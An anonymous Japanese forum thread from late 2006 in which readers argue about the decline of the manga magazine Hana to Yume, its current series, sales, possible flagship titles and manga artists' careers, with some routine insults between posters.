だから花ゆめスレ住人は痛いといわれるんだ

…と書いたらまたヒスおこして噛みつかれるんだろうなw
早く次の号出ればいいのに

273 :花と名無しさん:2006/12/27(水) 16:31:53 ID:???0
>>269 それが全てだよね。
鼻ゆめ斜陽は偏執の責任。
一時の人気に奢って読者を蔑ろ馬鹿にしたミウッチ優遇に始まり
手抜き放置、連載放棄も放置かと思えば
他のベテラン冷遇&新人育成怠慢。
ヨコタソなんか復帰させる必要ないのにもうアフォかバカかと。
100歩譲って復帰させるなら闇末を終了させるのが筋ってもんだろうに。
白癬では真面目にやってる漫画家ほど馬鹿を見る。

274 :花と名無しさん:2006/12/27(水) 17:11:22 ID:???0
>>267
その作家どもはさっさと移動してほしいわw
ファンも痛いし

275 :花と名無しさん:2006/12/27(水) 17:18:25 ID:???0
>>274がリナチャ読者へと移行した方が早い。

276 :花と名無しさん:2006/12/27(水) 17:19:14 ID:???0
昨日のアンチスキビヲバみたいなのが沸いてくると笑うけどね
>274もだけど基本みんな痛いよここの住人
花ゆめ読者の典型

277 :花と名無しさん:2006/12/27(水) 17:34:25 ID:???0
もうみんな今号のことを忘れてるみたいなのでもう一度(´A`)
こんなのがあったの思い出してネ

2号テンプレ

表紙(幸福)…
巻頭(アリス)…
幸福…
VBR…
SA…
グラサン…
がんばり…
悩殺…
オデット…
兄…
NG…
ブラッディ…
乳…
潔癖…
アラクレ…
シュガー…

付録(SA コミックス&CD BOX)…

3号表紙(スキビ)…
3号巻頭(幸福)…
2号総評…


278 :花と名無しさん:2006/12/27(水) 17:43:02 ID:???0
>>276
花ゆめ読者の典型ってなんだよ?そのチンケな勘違いカテゴリーは?

279 :だけど225。:2006/12/27(水) 18:00:00 ID:???O
高尾儲とジュリ房(ヲバ同盟)の集中砲火だね。
そう言う口汚いレスが、どれだけスレを汚し、一般の住人を傷つけてるか自覚して。
率直な作品や儲に対する感想を言っただけなのに…
ヲバ臭いのは作家や儲の責任なのに、それを指摘してあげたら袋叩き…
私に噛みつく前に、自分達のヲバ臭を治せばいいのに…orz

一般住人「その感性ヲバ臭いですよ」
ヲバ「ごめん。今度から気をつけます」
普通ならこれで終わる会話をいつまでも引きずってヌチヌチヌチヌチ…

280 :花と名無しさん:2006/12/27(水) 18:02:53 ID:???0
沈静化したいなら絶対こう書いちゃダメ!って見本みたいなレスだね

281 :花と名無しさん:2006/12/27(水) 18:08:57 ID:???O
中村と羅川ヲタも十分ウザイし他の漫画もヲタはウザイのに
流れ無視して高尾とジュリだけ取り上げてヲバ扱いするあんたは何ヲタ?
ヲバでないなら余計哀れだよあんた。

282 :花と名無しさん:2006/12/27(水) 18:22:33 ID:???0
ヌチヌチヌチヌチ…?

自分のこと?っていうかいい加減うざい。
自分が馬鹿なのをいい加減に自覚しろ。馬鹿。
一般住人と一緒にされたら迷惑。

ヲバでもタゲでもどーでもいい。
あんたが迷惑。


283 :花と名無しさん:2006/12/27(水) 18:23:49 ID:+x8SFW3q0
とりあえずスレが落ちつくために皆で幸福の良い点を一つづつ上げてみてはどうだろうか?

284 :花と名無しさん:2006/12/27(水) 18:43:05 ID:???0
幸福の良い点か
えーとえーと、読むのに時間がかからない?

285 :花と名無しさん:2006/12/27(水) 18:43:34 ID:???O
アシさんがお菓子描くの上手い。

286 :花と名無しさん:2006/12/27(水) 18:45:57 ID:???0
>>279 ヌチヌチヌチヌチって本名?

287 :花と名無しさん:2006/12/27(水) 18:52:10 ID:???0
取りあえずとばさないで読める。

288 :花と名無しさん:2006/12/27(水) 18:56:00 ID:???0
>>282 同意 絵がシンプルで読みやすい<幸福

289 :花と名無しさん:2006/12/27(水) 19:03:48 ID:???0
まっつんには花ゆめ版なかじを目指してがんばってほしい

290 :花と名無しさん:2006/12/27(水) 19:07:25 ID:???0
まっつんにはマユタンぽい露出アリのキュート系漫画家を目指してほしい

291 :花と名無しさん:2006/12/27(水) 19:13:09 ID:???0
幸福の良い点…

インクの消費が少ないので地球に優しい?

292 :花と名無しさん:2006/12/27(水) 19:19:45 ID:???0
ごめんwwww ヌチヌチヌチヌチが気になった
笑いをありがとう

293 :花と名無しさん:2006/12/27(水) 20:15:14 ID:???0
幸福の良い点・・・・・・・・

294 :花と名無しさん:2006/12/27(水) 20:29:19 ID:???0
>>283
・絵が上手くない人でも少女漫画家になれるんじゃないかと夢を与えてくれる。
でもこれってジャンプのポルタや斬に対してよく言われてたことだけどwww

295 :花と名無しさん:2006/12/27(水) 20:29:38 ID:???O
絵がシンプルだからタゲには人気

296 :花と名無しさん:2006/12/27(水) 20:31:55 ID:???0
>>295
ちょっと待てwタゲ層の自分でもツマラナイと思うぞw
でも恐ろしいことに結構売れてるんだよね・・・

297 :花と名無しさん:2006/12/27(水) 20:41:10 ID:???0
幸福はあれじゃないかな
男キャラの誰かに萌えられれば
それだけで読む価値があるんじゃないかな

298 :花と名無しさん:2006/12/27(水) 21:14:48 ID:???0
マンガもちょっと難しいと理解できない世の中になってるけど
幸福なら話も簡単だし誰でも理解できる

299 :花と名無しさん:2006/12/27(水) 21:23:12 ID:???0
幸福は他のマンガより唇がとんがってるからセクシー

300 :花と名無しさん:2006/12/27(水) 21:23:36 ID:83O3bxK80
>>294
実はまっつんも小学生なんじゃね?w

301 :花と名無しさん:2006/12/27(水) 21:25:04 ID:???0
>>300
そういやカラーで色鉛筆よく使ってんな

302 :花と名無しさん:2006/12/27(水) 21:28:57 ID:???0
>>301
実はクーピー

303 :花と名無しさん:2006/12/27(水) 21:40:10 ID:???0
つまり幸福のいいところをまとめると・・・

読むのに時間がかからない
アシさんがお菓子描くの上手い
取りあえずとばさないで読める
絵がシンプルで読みやすい
インクの消費が少ないので地球に優しい
絵が上手くない人に夢を与えてくれる
男キャラの誰かに萌えられれば読む価値があり
話も簡単だし誰でも理解できる

おまえら褒めてないだろwww

304 :花と名無しさん:2006/12/27(水) 21:42:17 ID:???0
>>303
ちゃんとした漫画として見られてないなwww

305 :花と名無しさん:2006/12/27(水) 21:43:29 ID:???O
スレで叩かれもしない空気漫画より遥かに存在感がある

306 :花と名無しさん:2006/12/27(水) 21:47:06 ID:???0
いつもの幸福叩きが始まった!

307 :花と名無しさん:2006/12/27(水) 22:04:10 ID:???0
スルーせず読んでる人がいるうちはいいんじゃない

308 :花と名無しさん:2006/12/27(水) 22:04:46 ID:???0
何気に今の花ゆめで一番タゲ人気あったりしてね>幸福
あんなんのどこがいいのか理解できない。

309 :花と名無しさん:2006/12/27(水) 22:06:56 ID:???0
ヌチヌチヌチヌチ
ヌヌネノヌヌネノヌヌネノ(゚∀゚)ラヴィ!!

古いネタだが

310 :花と名無しさん:2006/12/27(水) 22:07:00 ID:???0
タゲにしかわからない面白さがあるんじゃね?
数年後にはブコフに沢山溢れてそうだ

311 :花と名無しさん:2006/12/27(水) 22:07:17 ID:???0
花ゆめ.comのトップに主要作品のキャラ集合な画面があるんだけど今の配置が
              中央
4列目 悩殺       しゃにむ        スキビ
3列目   幸福
2列目    アリス         VBR     SA
最前列           フルバ

こんな感じなんだよね。
フルバの最終巻が出る頃にはこの配置も代わってくると思うんだけど
これで次に中央最前列に置かれる漫画が編集の考える次期看板って事になるのかな?

312 :花と名無しさん:2006/12/27(水) 22:07:59 ID:???0
>>309
なんか知らんけどぷちぷちラビィ思い出した

313 :花と名無しさん:2006/12/27(水) 22:10:54 ID:???0
>>311
なんとなくだけど次はアリスが来ると予想

314 :花と名無しさん:2006/12/27(水) 22:11:23 ID:???0
>>312
これだよ
http://kimishine.sega.jp/

315 :花と名無しさん:2006/12/27(水) 22:12:09 ID:???0
>>309
うわ、すっげ懐かしwwwww

316 :312:2006/12/27(水) 22:18:14 ID:???0
>>314
おお、ありがとう
よく考えるとぷちぷちラビィ知ってる人は絶対居ないわw

>>311
イナバ物置CMの人間の配置関係みたいだな

317 :花と名無しさん:2006/12/27(水) 22:24:22 ID:???0
>>289
なかじは絵が魅力…とララスレでちょっと前には言われてた気が
幸福は…まあどっちでもいっか

318 :花と名無しさん:2006/12/27(水) 22:53:31 ID:???0
ヌチヌチヌチヌチって

319 :花と名無しさん:2006/12/27(水) 23:02:59 ID:???0
>>311 
>これで次に中央最前列に置かれる漫画が編集の考える次期看板って事になるのかな?
花ゆめスレではよくある看板マンガ予想だが今は荒れるもとだよヒス…が

320 :花と名無しさん:2006/12/27(水) 23:08:04 ID:???0
フルバのイラストも見納め

321 :花と名無しさん:2006/12/27(水) 23:13:20 ID:???0
>>311こう見るとそろそろ連載修了しそうなマンガが多いよね
たいていのマンガが後半に入ってる気がするループに突入する場合もあるけど

322 :花と名無しさん:2006/12/27(水) 23:19:11 ID:???0
悩殺は家族にバラしたし、碧絡みの話だけかな
VBRも、あとは母親関係だけ?
アリスも両親の謎も棗の謎も全部終わったし
あとは学園と対決して母親と会って……
スキビは、なんかよく分からんがコーンバレきそうだしな
しゃにむは、一応計算してるようだが、まだだろうな

323 :花と名無しさん:2006/12/27(水) 23:39:04 ID:???O
新年最初の号って、通常一日フライング販売してる地域でも、発売日にしか売らないんだっけ?
だったら待つのが辛いなー

324 :花と名無しさん:2006/12/27(水) 23:41:45 ID:???0
いよいよ鼻夢廃刊準備?と勘ぐりたくなる。

325 :花と名無しさん:2006/12/27(水) 23:52:58 ID:???0
廃刊はないと思うが今一番ピンチな時だろうな。
フルバが終わる前に、編集は新看板を立てておくべきだったね。

326 :花と名無しさん:2006/12/27(水) 23:53:04 ID:???O
とりあえずゲッターはいるみたいだな。

327 :花と名無しさん:2006/12/28(木) 00:14:04 ID:???0
もうさ〜やる気のないマンガ家、
能力のないマンガ家、変臭のロボットマンガ家だけ使って
タゲ層ネライだけでやってくならいっその事、
「二世代三世代読者不要、花ゆめ小中坊宣言」でもやって下さい。

328 :花と名無しさん:2006/12/28(木) 00:21:17 ID:???0
動物のお医者さんが花ゆめだったと知った時は驚いたもんだが
それを考えると、今はものすげー子供っぽい雑誌になったんだなと思う。


329 :花と名無しさん:2006/12/28(木) 05:09:07 ID:???O
>>322
悩殺は碧以外にも続けようと思えば高校生編とかできそう
売り上げ落ちてきてるがそれでも中堅だから続くかも
VBRは母親登場したから話進みそうだが結婚までやるんじゃない?
アリスは両親の謎未解決で、たしかまだ父親は顔すら出てない
スキビはダークムーン編が長いのと亀過ぎるけどコーンバレ以外にも
まだまだだから20巻超えは確実。ただ無駄に大コマ多様はやめてほしい
しゃにむは多分卒業までやる、出来ればプロ編もやってほしい

そういやSAは何を目的に?連載決まってから1年をやり直し
滝島は2回も誕生日をやった魂胆は何なんだろ。

330 :花と名無しさん:2006/12/28(木) 07:14:37 ID:???0
>>329
SAは滝島の祖父との話に決着つけて終了じゃないかな。まだそれまでしばらくかかるだろうけど。
後しゃにむは流石に高校で終わると思う。全国大会で駿、ルーイと対決でENDでしょ。

331 :花と名無しさん:2006/12/28(木) 07:15:23 ID:???0
悩殺高校生編あんまり興味ないな
多分今と同じ様な話になるだろうそれこそループ
今の話をきっちりまとめてくれるのが一番


332 :花と名無しさん:2006/12/28(木) 07:48:02 ID:???0
>>331
>今の話をきっちりまとめてくれるのが一番

そんな殊勝な考えなど微塵もないのが花夢。

333 :花と名無しさん:2006/12/28(木) 07:52:22 ID:???O
フルバが終盤に入ってから新たな看板候補を探してはいたみたいだけど
どれも結局中ヒット程度から伸びないまま現在に至った感じ?
準備不足だったのにはアリスのメディア化に期待しすぎて外したのもあるかも。
一つだけでもフルバ、ハチクロ級の雑誌を支えられる作品があればなぁ。
そしたら他の漫画も読んで貰える機会が増えるよね。

今はりぼんやマーガレットみたいに暗黒期だとしたらララが黄金期?
花ゆめはヲタ雑誌なんだから昔みたいなヲタ受けする個性的新人育てて欲しい。

334 :花と名無しさん:2006/12/28(木) 07:53:33 ID:???O
3号は公式発売日の1月4日に入荷なので
1月3日にコンビニや本屋めぐりをしても入ってないと思う。
5日が平日(金曜)なのに1日早い

335 :花と名無しさん:2006/12/28(木) 08:01:44 ID:???O
>>333
中ヒットにも満たない作品ばかり。

スキビ・VBR・フェロモ・アリスでやっと中ヒット。
あとはそれ以下。

336 :花と名無しさん:2006/12/28(木) 08:05:34 ID:???O
スキビバレきてるね!

ゲッターさんテンプレよろしく

337 :花と名無しさん:2006/12/28(木) 08:27:43 ID:???O
「この作品の名前は漫画好きなら皆知ってる」とか
「絵がとにかく綺麗」とか一個もないのは悲しいね。
どれもレベルは低くないとは思うけど集客力は弱い。
今までは大ヒットが途切れるのはあんまりなかったのに。
編集は何やってるんだ…。

338 :花と名無しさん:2006/12/28(木) 08:32:11 ID:???0
>>337 作品の名前〜はともかく、「絵が綺麗」は難しいね。

339 :花と名無しさん:2006/12/28(木) 08:46:09 ID:???0
ひそかにトビナさんに期待してるんだがなぁ・・・。
潔癖、今のできちんと終わらせてほしい。
そしてまだ勢いのあるうちに、
きちんと練った別の短期連載をやらせて、
ちゃんと育てたら、
それなりに話のかける個性的な作家になりそうなのに。

340 :花と名無しさん:2006/12/28(木) 08:54:32 ID:???0
潔癖は最低コミック3巻分くらいは描かせそ。

はなゆめ投稿者は連載前提でデビュー作を描かなきゃならないって訳。

341 :花と名無しさん:2006/12/28(木) 08:58:10 ID:???0
最近の新人さんで、
読みきり好評→連載化→終了
で、次に始めた連載でさらに
ステップアップしてる人って
ほとんどいなくない?
たいてい前作よりショボくて終わる。

小さい小さい一発屋ばかりなのか・・・。


342 :花と名無しさん:2006/12/28(木) 09:05:58 ID:???0
いろんなタイプの小作品を描かせて地力つけさせればいいのに
ちょっと人気が出たからって無理に引き伸ばすから
似たような話しか描けなくなって次の連載で飽きられるんじゃないの?

343 :花と名無しさん:2006/12/28(木) 09:06:53 ID:???0
それだけ白癬は漫画家が枯渇してる。
もう寝食忘れて仕事するって時代でもないし
転職も簡単な時代。一冊でもコミックス出したら満足して
「隔週連載なんてマンドクセ!終了!」なんジャマイカ?

344 :花と名無しさん:2006/12/28(木) 09:21:14 ID:???0
>>337 今文庫化されてる昔の花ゆめの本は今見ても面白かった
絵は微妙だけど話は面白いものが結構あったのだね、ちょっと話が複雑だったり
今連載のマンガって数年後に読もうと思えないような…カナシス


345 :花と名無しさん:2006/12/28(木) 09:21:34 ID:???O
このスレ大きく分けると3タイプだね

1、総合的に評価するタイプ
特徴:好きな作品、作家はいるがヲタではない。習慣として購入
批評するとき過去作と比較して現状に悲観的。だが雑誌には愛着あり。

2、作品作家目当てに購入するタイプ
特徴:作品が掲載されていれば雑誌にさほど不満はないが愛着もない。
作品がつまらなくなったり終了すれば速やかに卒業する。

3、とにかく叩くタイプ
特徴:誉められた作品を片っ端から叩いていく。目的は不明。


自分は1と2の中間だな。

346 :花と名無しさん:2006/12/28(木) 09:23:05 ID:???0
>もう寝食忘れて仕事するって時代でもないし 転職も簡単な時代

バブル以降ずっと
寝食忘れて仕事する時代のような気がするが・・・。
それに一つ連載終えてから就職するったって
女で25過ぎで職歴もない元漫画家なんか
まともに正社員で雇ってもらうの難しいよ。

体壊したり結婚・出産したり同人に流れたりして
プロやめてく人は多いだろうけどね。

347 :花と名無しさん:2006/12/28(木) 09:24:50 ID:???0
経験を積んだら伸びそうな新人は沢山居るのに、
デビュー作とかで人気あったらすぐ連載ってのが・・・勿体無い。
そんなやり方してたら本当に一発屋の漫画家ばっかりになって最後には廃刊だぞ。廃刊。
今ならまだ間に合う筈なんだが。

348 :花と名無しさん:2006/12/28(木) 09:28:29 ID:???0
ちょっとバカなのが住み着いてるのはたしかだけどヌチヌチヌチヌチとか



349 :花と名無しさん:2006/12/28(木) 09:34:57 ID:???0
最近の新人って出たとたんにおっ上手って思える印象に残る人がいない地味
花ゆめ作家自体がそんなインパクトある作家いない
他誌ではデビュー当初から「この人絵とか話とか面白いな」って思える人っているのに
育てる時点で種が小粒なのが集まるけどこれって雑誌自体が地味だから?
デビューする方も競争率低そうな雑誌選んできてるのかな?
今ヒットとか中ヒットの作品でさえ冷静に見れば地味で大ヒットまでたどりつけない
NANAとかハチクロみたいに漫画を普段読まない人でも読むような話がないのがくやしいな

350 :花と名無しさん:2006/12/28(木) 09:45:01 ID:???0
>>346 オメーは脳内消防カヨwそれともそんなに劣悪な生活環境なのか?

大人も子供も週休二日が当たり前の時代に何を言うやら・・・・
第一、漫画家でまともに食っていけるのは一握り。
労働の対価って点ではヒット作を出さない限りフリーターの方がずっとマシ。

351 :花と名無しさん:2006/12/28(木) 09:53:58 ID:???0
その代わりヒット作一本で左団扇だけどね。
他の職業より一攫千金を狙いやすく見えるのかもよ。

352 :346:2006/12/28(木) 09:54:35 ID:???0
>350

ごめんね。
転職って言うから正社員になるって意味かと。
フリーターになることを「転職」って言う人がいるとは
思わなかったので。
あと、自分今は週休二日残業少しなんだけど、
前は広告会社に勤めていてけっこう労働状況は厳しかったから
そこがちょっと基準になっていたかもしれない。


353 :花と名無しさん:2006/12/28(木) 09:59:40 ID:???0
>>352 本当にアフォなのねw

354 :花と名無しさん:2006/12/28(木) 10:00:13 ID:???0
漫画家なんて自己管理だろ
描かなきゃお金もらえないし
描いても売れなきゃはした金
残業どころか作品できるまでずっと仕事なんだろう

何もしなきゃそれもいいんだろうが収入0
絶対いやだとは思うが読むこっちも面白くない漫画なんてお金出して買う気も起きないから
本人がいくらがんばってる気になってもそんなの関係ないし


355 :花と名無しさん:2006/12/28(木) 10:02:34 ID:???0
マンガ家とかアシスタントって世間一般では正社員扱いなの?
自営とバイト君だと思ってた。

356 :花と名無しさん:2006/12/28(木) 10:02:36 ID:???0
仮にも漫画家として
コミクスの一冊も出したら
ただのフリーターになりたい人は
そうそういないと思うがな。

357 :花と名無しさん:2006/12/28(木) 10:05:54 ID:???0
漫画家は正社員ではない。自営。
アシスタントも雇い先の漫画家が
会社化してない限りは社員ではなくバイト。

あとフリーターになるのは普通転職とは言わない。
フリーターって正式な呼び方は無職だったと思う。

358 :346:2006/12/28(木) 10:10:30 ID:???0
>>352 >>357
おいおい・・・・そんな事で絡まれても・・・>転職
つーか比喩で使っただけだが
そんなに気に障ったのかよ?そりゃ悪かったね。

359 :花と名無しさん:2006/12/28(木) 10:11:03 ID:???0
昔絵が上手かったヤツが漫画家になって雑誌でデブーが決まったとかたまに聞くが
芸能人以上に噂を聞くことが多いので漫画家って意外とデブーは簡単なのか?と
疑問に思ったことはあった


360 :花と名無しさん:2006/12/28(木) 10:12:40 ID:???0
フリーターでしか働いたことがない人にとっては
フリーターになるのも「転職」と思っててもおかしくないし、
逆に正社員経験がある人なら、
転職=正社員になる、と思い込んでるかもしれない。
350は前者で352は後者だったんだろ。どうでもいい。

ただ漫画家になるような人って
それなりにその仕事に(内容的にも金的にも)
夢もって努力してなってるんだろうから、よほどのことがないと
わざわざフリーターになるとは思えない。

361 :花と名無しさん:2006/12/28(木) 10:14:56 ID:???0
>>360
夢と現実は違うからねぇ…努力が報われる世界でもないし。

362 :花と名無しさん:2006/12/28(木) 10:16:28 ID:???0
転職=正社員
じゃあ派遣社員はフリーターですか?

363 :花と名無しさん:2006/12/28(木) 10:17:20 ID:???0
漫画が別に好きでもなく、
たいして努力せずにデビューした人なら
馬鹿馬鹿しくなって辞める人も
いるかもしれんが・・・。
それでもデビューできたんなら
才能あるだろうから意外と成功してそう。

才能なくても努力でデビューした人なら
ちょっとやそっとのことじゃやめなさそう。



364 :花と名無しさん:2006/12/28(木) 10:19:25 ID:???0
>>358
自分にレスしているが・・・。

365 :花と名無しさん:2006/12/28(木) 10:19:59 ID:???0
>362 正社員である事にしかレゾンデートルを見いだせない香具師なんかほっとけよ。

366 :花と名無しさん:2006/12/28(木) 10:23:14 ID:???0
>362
派遣社員は派遣社員だよ・・・・。

367 :花と名無しさん:2006/12/28(木) 10:23:38 ID:???0
漫画家という職業が好きでやってそうな現作家
◆高屋、羅川、樋口、冴えない、草なぎ、仲村、福原、南 あたりかな。

368 :花と名無しさん:2006/12/28(木) 10:24:59 ID:???0
>>367
福原?福山じゃなくて?

369 :花と名無しさん:2006/12/28(木) 10:26:18 ID:???0
>>368 もっと軽くつっこんでやれよ

370 :花と名無しさん:2006/12/28(木) 10:30:00 ID:???0
>>368 ゴメソw

371 :花と名無しさん:2006/12/28(木) 10:34:19 ID:???0
>>367 
その面子から判断できるのは宝くじを当てた人もいるけど
好きな職業に就けば報われるとは限らないって事ですな。

372 :花と名無しさん:2006/12/28(木) 10:35:25 ID:???0
>>369
いや、福原って漫画家って自分が知らないだけで居たのかなって思って
>>370
ドンマイ

373 :花と名無しさん:2006/12/28(木) 10:46:52 ID:???0
自分も福原ってのがいるんだ
と納得してた。
藤とか凪とか南とか似た名前多い。

374 :花と名無しさん:2006/12/28(木) 11:11:52 ID:???0
白泉社は芦沢あみみたく丸パク作品にでも
賞をあげて雑誌掲載までしてくれる心優しい出版社。
自社の過去作品をリメイクさせればOK!

375 :花と名無しさん:2006/12/28(木) 12:03:27 ID:???0
今でもすでに
番外編とか続編とかで
いいかげんgdgdになってるじゃないか・・・

376 :花と名無しさん:2006/12/28(木) 13:07:59 ID:???0
>>374 まっつんに山口美由紀リメならいい鴨!

377 :花と名無しさん:2006/12/28(木) 14:35:26 ID:???0
>>374
柄亀リメイク→役者もののスキビ
僕地球リメイク→前世が出てくるからNG
動物のお医者さん→動物いっぱいのフルバ
紅茶王子→お茶の文字があるから幸福

378 :花と名無しさん:2006/12/28(木) 15:01:00 ID:???O
何その無理やりなリメイクw

379 :花と名無しさん:2006/12/28(木) 15:05:26 ID:???0
しかも原作より数段劣化してるし・・・

380 :花と名無しさん:2006/12/28(木) 15:28:41 ID:???0
紅茶と幸福はいい感じに同レベルじゃない?

381 :花と名無しさん:2006/12/28(木) 16:21:31 ID:???0
紅茶は面白い時期や絵が好きな時期もあったけど
幸福は今のところどっちもない


382 :花と名無しさん:2006/12/28(木) 16:32:41 ID:???O
さすがに幸福と比べたら波に失礼だろw

383 :花と名無しさん:2006/12/28(木) 17:45:00 ID:???O
紅茶は今で言うスキビくらいは売れてたしね。

384 :花と名無しさん:2006/12/28(木) 18:28:18 ID:???O
もっと売れてたんじゃない?
名前は知られてた気がするんだが。

385 :花と名無しさん:2006/12/28(木) 18:37:05 ID:???O
売り上げスレかなんかで結構上位にいた気ガス>紅茶
週間トップテンによく入ってたし、売り上げは幸福と比べ物にならん

386 :花と名無しさん:2006/12/28(木) 18:42:47 ID:???O
なぜか中ヒットを長期連載した作者って安定して中ヒットくらいは描けても
大ヒットは一生出せなくなるパターン多いよね。
中ヒット程度でズルズルとやると作者が腐らされる感じ。紅茶も。
スパッと終わらせてやるのが作者のためであり雑誌のためになる場合もある。

387 :花と名無しさん:2006/12/28(木) 18:43:26 ID:???0
紅茶は売れてたよ。波だって看板候補だった。

388 :花と名無しさん:2006/12/28(木) 18:55:13 ID:???O
一番売れてた頃は候補どころか看板クラスだったのでは?>紅茶
フルバと比べたらそりゃ落ちるし連載終了時は人気も話もgdgdだったけど。

389 :花と名無しさん:2006/12/28(木) 19:08:59 ID:???0
フルバが大ヒットする前は紅茶や花キモや天禁や闇末やWジュリやセカキラや
しゃにむやクレパラが今のスキビ・VBRみたいに週間ベスト10に入ってたね。
大ヒットは無いけど中ヒットは沢山あったって感じ。

390 :花と名無しさん:2006/12/28(木) 19:40:38 ID:???0
>>383
日高に負けてた気がするけど
まぁわかんないよね

391 :花と名無しさん:2006/12/28(木) 19:45:48 ID:???O
>>390
終盤は確かに日高に負けてたけど、初期〜中期は本当に準看板レベル。>紅茶
コアな人気で1000万部売った天禁とは、対極な位置づけで、同じくらい人気だったよ。

392 :花と名無しさん:2006/12/28(木) 20:00:02 ID:???0
部数でてないの?>紅茶
25巻も出てるから天禁より1000万部行き易いだろうけど。

393 :花と名無しさん:2006/12/28(木) 20:15:22 ID:???O
僕玉の終了時には、既に赤僕が人気で、看板の世代交代に成功。
赤僕の終了した号から、1年くらい後にフルバ連載開始。
こう考えると、赤僕終了〜フルバが看板に育つまでの期間が暗黒期と思われがち。
…でも実際は違うんだよね。
赤僕が終了しても、単巻で50万部クラスの花君・天禁の2作があり。
(50万部クラス=今でいう、僕らがいたレベル)
他に紅茶・闇末・セカキラ・未来のうてな・クレパラ・NYNYがベスト10常連。
(紅茶・闇末あたりは、おそらく今のスキビより売れてる)
しかも安達祐美主演に合わせ、柄亀が連載再開。
他にも山口美由紀やモチカリ、当時新人の高尾が良作を描いてた。

↑こんな状態を暗黒期とは言わないでしょ?
この状態から更に、フルバが大化け、Wジュリの中ヒットに繋がるワケだから。


現在の花ゆめが、間違いなく誌上最大の暗黒期。

394 :花と名無しさん:2006/12/28(木) 20:35:51 ID:???0
>現在の花ゆめが、間違いなく誌上最大の暗黒期。

当たり前。

395 :花と名無しさん:2006/12/28(木) 20:39:45 ID:???0
カエル姫と比較されてた
川原泉の「銀のロマンティックわはは」を50円で買った。
なんでだろう?巧いと言えない絵にあり得ない展開なのにラストは泣けた。


396 :花と名無しさん:2006/12/28(木) 20:59:33 ID:???O
紅茶が何巻続いたとおもってるんだ?
フルバや花君の全盛期とかぶるのがある意味不利だけど、
今の花とゆめだったらぶっちぎり大看板のヒット作品だよ。

397 :花と名無しさん:2006/12/28(木) 21:10:43 ID:???0
紅茶はフルバ程売れてたわけじゃないしぶっちぎりって程じゃなくてスキビVBRよりは売れてる位じゃないか?

398 :花と名無しさん:2006/12/28(木) 21:12:31 ID:???0
スキビだって大看板だなんて言われてないから
紅茶が今も残ってても、ショボい看板って言われて終わりだと思う。

399 :花と名無しさん:2006/12/28(木) 21:27:28 ID:???0
スキビもVBRも暗黒期の中では比較的売れてるからって看板扱いされても迷惑な話だろうな

400 :花と名無しさん:2006/12/28(木) 21:34:21 ID:???0
>>399
そう?スキビの重大発表がなんだかハッキリして無いけどこんな状況だからこそ
アニメ化かドラマ化されるんじゃない?

401 :花と名無しさん:2006/12/28(木) 21:57:59 ID:???0
自分スキビ好きだがアニメを見たいとは思わない・・。
でも重大発表ってなったら、メディア化だろうね

402 :花と名無しさん:2006/12/28(木) 22:16:43 ID:???O
ここでも散々言われてるけどアニメ、ドラマ向きの話じゃないもんなー>スキビ

403 :402:2006/12/28(木) 22:19:06 ID:???O
スマソ間違えた
話っていうよりは漫画自体がって意味です
話自体は芸能界ものだし怨霊キョーコ抜かせばドラマ向きだろうけどね

404 :花と名無しさん:2006/12/28(木) 22:25:27 ID:???0
のだめみたいに寒いCGで再現>怨霊キョーコ

405 :花と名無しさん:2006/12/28(木) 22:28:03 ID:???0
怨霊キョーコだけはアニメで観てみたい気もするw

406 :花と名無しさん:2006/12/28(木) 22:35:28 ID:???0
紅茶も闇末もハナキモも作品そのもの以外のところで
色々と有ると読者は迷惑だよね。
結果的にそれが 作者モチベーション低下→作品品質劣化となる。
出しゃばらず、余計な色気出さず、漫画だけ描いてりゃ良いのに
ヒット作出すと人間として偉くなったと勘違いする馬鹿がいて困る。


407 :花と名無しさん:2006/12/28(木) 22:37:53 ID:???0
そもそも白癬は作家の管理方法を間違えてるよ。

408 :花と名無しさん:2006/12/28(木) 22:41:10 ID:???0
>>407
それいつからだろうね・・。
いつの間にかこうなちゃったよ。

409 :花と名無しさん:2006/12/28(木) 22:52:56 ID:???0
>>395
あれ良かったよね、トボケた絵と進行が
ありがちではあるけど、やっぱり泣けちゃうラストへとつながる
まあ、古き良き時代だよ

410 :花と名無しさん:2006/12/29(金) 00:21:53 ID:???0
白泉オンラインの正月壁紙、花ゆめはしゃにむなんだね。
ちょっと意外だ。

411 :花と名無しさん:2006/12/29(金) 00:40:15 ID:???0
タゲ受けは悪くとも正真正銘、仕事をこなす能力は
花夢一だから仕方ないかも。>羅川
悲しいかな他は余力の無いヒトばかりだし。

412 :花と名無しさん:2006/12/29(金) 00:42:04 ID:???0
見てきたけど、あのイラストは描きおろし?

413 :花と名無しさん:2006/12/29(金) 01:41:02 ID:???0
あれ付録カレンダーの絵そのまんまじゃん。
仕事能力関係なしだ。
正月らしい絵が決め手だったのかな。
それに羅川なら知名度あるしもヲタも居そうだし。

414 :花と名無しさん:2006/12/29(金) 05:19:14 ID:???O
世間で一番話題性があるのって実は幸福?アリス?
スキビや羅川は地味だし、勢いあるのは幸福なのかな。
てか幸福がこれだけプッシュされる時点で終わってるよ。

415 :花と名無しさん:2006/12/29(金) 07:53:40 ID:???O
>>411
羅川ヲタウザ
どうやら叩かれたいようですね。

416 :花と名無しさん:2006/12/29(金) 08:26:41 ID:???O
今日から31日までコミケですね。
行った人、花ゆめ作家のコミケ参加報告よろしく

417 :花と名無しさん:2006/12/29(金) 08:27:15 ID:???0
>>415お前根性がヌチヌチヌチしてるな

418 :花と名無しさん:2006/12/29(金) 08:44:34 ID:???0
読者同士で大ヒット争いしても
所詮世間一般には知らない漫画だよ
フルバでさえタゲの中高生でも知らない子多いし
何そのマンガヲタっぽいって反応多い
まあ、人に物を貸す場合相手の趣味も考えるから
同じ趣向の物同士で貸し借りしてたら
冷たい反応は少ないとは思うけど
ここでどれがヒットしてるっていっても
社会現象になるほどの影響もない


419 :花と名無しさん:2006/12/29(金) 09:08:53 ID:???0
>>418 
大ヒット争いってどのレス?

420 :花と名無しさん:2006/12/29(金) 09:09:48 ID:???0
色鉛筆ヌリヌリヌリヌリヌリヌリ

421 :花と名無しさん:2006/12/29(金) 09:10:28 ID:???0
花ゆめには大ヒットなんてありません

422 :花と名無しさん:2006/12/29(金) 09:12:17 ID:???0
>>418
このスレみてていつも思う
住人どうしで叩きあっってるが何でこうなるかって考えた


423 :花と名無しさん:2006/12/29(金) 09:13:27 ID:???0
目糞鼻糞ってことか

424 :花と名無しさん:2006/12/29(金) 10:04:56 ID:???0
句読点ないね。

425 :花と名無しさん:2006/12/29(金) 11:02:26 ID:???O
フルバも終わった今
このまま大ヒットが出てこないなら
消えるのを待つだけか

426 :花と名無しさん:2006/12/29(金) 12:20:50 ID:???O
